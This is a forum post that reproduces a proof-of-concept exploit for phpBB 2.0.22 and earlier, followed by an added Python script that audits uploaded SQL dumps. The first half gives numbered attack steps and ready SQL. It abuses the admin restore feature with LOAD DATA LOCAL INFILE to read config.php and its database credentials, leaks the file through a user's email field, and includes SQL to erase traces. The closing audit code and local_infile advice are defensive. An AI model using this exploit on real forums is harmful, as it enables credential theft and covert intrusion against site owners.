Kekkei Posted December 10, 2007

## phpBB <= 2.0.22 Remote Database Authentication Details POC
##
## This text will show you how to get the content of the file
## config.php with the 'LOCAL INFILE' SQL command. You can also
## do it with 'LOAD_FILE' but you'll need file privileges, that's
## not interesting. To do it, you'll need Administrator rights
## (we'll use admin_db_utilities.php) and local_infile=ON
## (you don't need file privileges, that's why it's quite cool).
## PHP scripts should not permit the user to execute SQL commands.
##
## 1 Go to http://<victim>/login.php?redirect=admin/index.php&admin=1
## 2 Log in as Administrator
##
## 3 Go to http://<victim>/admin/admin_styles.php?mode[]=create&sid=<sid>
## 4 You'll get a full path disclosure, note it somewhere
##
## 5 Go to http://<victim>/admin/admin_db_utilities.php?perform=backup&sid=<sid>
## 6 Choose "Structure-Only backup" then click on "Start Backup"
## 7 Now open the file and search the table prefix, note it
##
## 8 Go to http://<victim>/admin/admin_db_utilities.php?perform=restore&sid=<sid>
## 9 Create a file which has this content [replace <phpbb_fullpath>,<user>,<prefix>]:
## /*----------------------------------------------------------------------*/
## CREATE TABLE tmp_hack(content text, email text, viewemail text);
## LOAD DATA LOCAL INFILE '<phpbb_fullpath>config.php' INTO TABLE tmp_hack FIELDS
## TERMINATED BY '__eof__' ESCAPED BY '' LINES TERMINATED BY '__eof__';
## UPDATE tmp_hack SET viewemail=(SELECT user_viewemail FROM <prefix>users WHERE
## username='<user>'), email=(SELECT user_email FROM <prefix>users WHERE username='<user>');
## UPDATE <prefix>users SET user_viewemail=0, user_email=
## CONCAT('"><span class="gen">Encoded content</span><input',
## UNHEX(20),'type="text" value="',
## (SELECT HEX(content) FROM tmp_hack),'"></input><input type="hidden')
## WHERE username='<user>';
## /*----------------------------------------------------------------------*/
## 10 Choose the file then click on "Start Restore"
##
## 11 Go to http://<victim>/profile.php?mode=editprofile, get the encoded content
## 12 This is the encoded content of the file config.php, use the pack() function to decode it
## 13 For example, with php, type this in your shell: php -r "print(pack('H*','<encoded_file>'));"
## 14 Note that I encoded the file content because this can produce an SQL error (e.g. login.php)
##
## 15 If you want to clear traces, execute this SQL file [replace <prefix>,<user>]:
## /*----------------------------------------------------------------------*/
## UPDATE <prefix>users SET user_viewemail=(SELECT viewemail FROM tmp_hack),
## user_email=(SELECT email FROM tmp_hack) WHERE username='<user>';
## DROP TABLE tmp_hack;
## /*----------------------------------------------------------------------*/
##
## by DarkFig <gmdarkfig (at) gmail (dot) com>
## http://acid-root.new.fr/
## #acidroot@irc.worldnet.net
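The weakness the POC above relies on is that the restore feature replays whatever SQL the uploaded dump contains, so a single LOAD DATA LOCAL INFILE turns a backup restore into a file read. As an added example (not part of Kekkei's post or of DarkFig's POC, and written in Python rather than phpBB's PHP so it runs stand-alone), here is a pre-restore audit that a backup-restore feature could run over an uploaded dump before executing it: it rejects statements that read or write files, statement types a dump never needs, and any table outside the board's own prefix. The two sample dumps, the prefix `phpbb_`, the file path and the allowed-verb list are constructed assumptions; the tampered sample only mirrors the shape of the restore file described above so the audit has something to flag.

```python
import re
from typing import List, Tuple

# Constructed sample inputs (not taken from the original post). The second one
# mirrors the shape of the restore file the POC describes, with a made-up path.
BENIGN_DUMP = """
/* structure-only backup, constructed sample */
DROP TABLE IF EXISTS phpbb_users;
CREATE TABLE phpbb_users (user_id int, username varchar(25), user_email varchar(255));
INSERT INTO phpbb_users VALUES (2, 'admin', 'admin@example.invalid');
"""

TAMPERED_DUMP = """
CREATE TABLE tmp_hack(content text, email text, viewemail text);
LOAD DATA LOCAL INFILE '/path/to/phpbb/config.php' INTO TABLE tmp_hack FIELDS
TERMINATED BY '__eof__' ESCAPED BY '' LINES TERMINATED BY '__eof__';
UPDATE phpbb_users SET user_email=(SELECT HEX(content) FROM tmp_hack) WHERE username='admin';
"""

# Statement types a dump restore legitimately needs. Assumption: a phpBB 2 dump is
# DROP/CREATE/INSERT plus the occasional SET/LOCK; anything else is suspicious.
ALLOWED_VERBS = {"DROP", "CREATE", "INSERT", "ALTER", "SET", "LOCK", "UNLOCK"}

# Constructs that read or write files and therefore never belong in an uploaded dump.
DISALLOWED = [
    (re.compile(r"\bLOAD\s+DATA\b", re.I),
     "LOAD DATA pulls a file through the client connection (only needs local_infile=ON)"),
    (re.compile(r"\bLOAD_FILE\s*\(", re.I),
     "LOAD_FILE() reads a server-side file (needs the FILE privilege)"),
    (re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\b", re.I),
     "INTO OUTFILE/DUMPFILE writes a server-side file"),
]

# Table names that follow DDL/DML keywords; IF [NOT] EXISTS and backticks are skipped.
TABLE_REF = re.compile(
    r"\b(?:CREATE\s+TABLE|DROP\s+TABLE|INSERT\s+INTO|UPDATE|INTO\s+TABLE|FROM)\s+"
    r"(?:IF\s+(?:NOT\s+)?EXISTS\s+)?`?(\w+)`?", re.I)
STRING_LITERAL = re.compile(r"'(?:\\.|[^'\\])*'", re.S)


def strip_comments(sql: str) -> str:
    """Remove /* */ blocks and whole-line -- or # comments."""
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)
    return re.sub(r"^\s*(?:--|#).*$", " ", sql, flags=re.M)


def split_statements(sql: str) -> List[str]:
    """Split on ';' while honouring single-quoted literals (with backslash escapes)."""
    stmts, buf, in_str, i = [], [], False, 0
    while i < len(sql):
        ch = sql[i]
        if in_str:
            buf.append(ch)
            if ch == "\\" and i + 1 < len(sql):   # keep the escaped char, including \'
                i += 1
                buf.append(sql[i])
            elif ch == "'":
                in_str = False
        elif ch == "'":
            in_str = True
            buf.append(ch)
        elif ch == ";":
            s = "".join(buf).strip()
            if s:
                stmts.append(s)
            buf = []
        else:
            buf.append(ch)
        i += 1
    s = "".join(buf).strip()
    if s:
        stmts.append(s)
    return stmts


def audit_restore_sql(sql: str, prefix: str) -> List[Tuple[int, str]]:
    """Return (statement number, reason) for everything the restore should refuse.
    Keywords are matched with string literals masked, so 'from' inside data is ignored."""
    findings = []
    for n, stmt in enumerate(split_statements(strip_comments(sql)), start=1):
        masked = STRING_LITERAL.sub("''", stmt)
        verb = masked.split(None, 1)[0].upper()
        if verb not in ALLOWED_VERBS:
            findings.append((n, f"statement type {verb} is not part of a backup restore"))
        for pattern, why in DISALLOWED:
            if pattern.search(masked):
                findings.append((n, why))
        for table in TABLE_REF.findall(masked):
            if not table.lower().startswith(prefix.lower()):
                findings.append((n, f"table {table!r} is outside the board prefix {prefix!r}"))
    return findings


if __name__ == "__main__":
    print("benign dump:", audit_restore_sql(BENIGN_DUMP, "phpbb_") or "no findings")
    for num, why in audit_restore_sql(TAMPERED_DUMP, "phpbb_"):
        print(f"statement {num}: {why}")
```

The audit is deliberately an allowlist on statement type and table prefix plus a denylist on file-access constructs, so a dump that needs a new statement type fails loudly rather than slipping through. Refusing the dump is only the application-level half of the fix: the page's own point that the attack needs nothing beyond local_infile=ON means the server-side setting (local_infile=0 in the MySQL configuration, and a client built without LOCAL support) is the control that removes the file read regardless of what the restore script accepts.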